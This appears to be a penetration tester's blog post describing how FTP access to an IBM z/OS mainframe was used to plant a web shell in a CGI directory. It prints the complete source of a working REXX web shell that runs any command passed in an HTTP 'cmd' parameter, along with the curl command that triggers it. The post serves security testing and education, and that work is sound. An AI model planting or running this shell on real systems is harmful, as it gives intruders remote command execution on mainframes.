Wednesday, June 22, 2016 At 2:58PM
Recently I was conducting a mainframe assessment (z/OS), and the application account I had access to was able to FTP directly to the system. There were also multiple web servers listening on the host, so I used web shell planting tactics to gain remote command execution — albeit with an uncommon scripting language (REXX).
Typically when you FTP to an IBM mainframe you will find yourself in the Multiple Virtual Storage (MVS) file system. This is indicated by “Remote system type is MVS” in the FTP response message.
It’s possible to change to a Unix-like file system, Hierarchical File System (HFS), to make it easier to understand (at least for me!). This can be accomplished by executing a simple change directory command using FTP.
Change to HFS
ftp> cd / 250 HFS directory /s the current working directory
After identifying this access, I trawled through the more familiar file system and came across a CGI web root that permitted the execution of REXX scripts. REXX is an interpreted scripting language developed by IBM that dates back to the beginning of the 80s.
After creating a simple REXX web shell, I was able to upload the shell to the web root and chmod
it with the appropriate permissions.
REXX Web Shell
/* rexx */ 'cgiutils -status 200 -ct text/x-ssi-html' address syscall 'pipe p.' 'cgiparse -f > /dev/fd' || p.2 address syscall 'close' p.2 address mvs 'execio 1 diskr' p.1 '(stem s.' interpret s.1 do i=1 to 100 until s.1='' parse var s.1 parm.i.1 '=' parm.i.2 '&' s.1 if parm.i.1 = 'FORM_cmd' then do cmd = parm.i.2 cmd = STRIP(cmd, ,"'") end end say 'Running as ' || USERID() say 'Executing the following command... "' || cmd || '"' address syscall 'pipe p.' cmd || ' >/dev/fd'||p.2 address syscall 'close' p.2 address mvs 'execio * diskr' p.1 '(stem s.' do i=1 to s.0 say s.i end return
Finally, by sending a command to be executed in the cmd HTTP request parameter, I was able to gain command execution on the system as the WWWPUB user. Although there was FTP access, it is much easier to enumerate and attack the system given interactive execution of commands and this also provided different access permissions.
The script can be executed like so:
$ curl http://host/cgi/foo/cmd.rexx --data-urlencode 'cmd=id'
Here we can see an example of the ps -ef
command being executed by the WWWPUB user in the CGI directory.
Author: Sam Bertram
©Aon plc 2023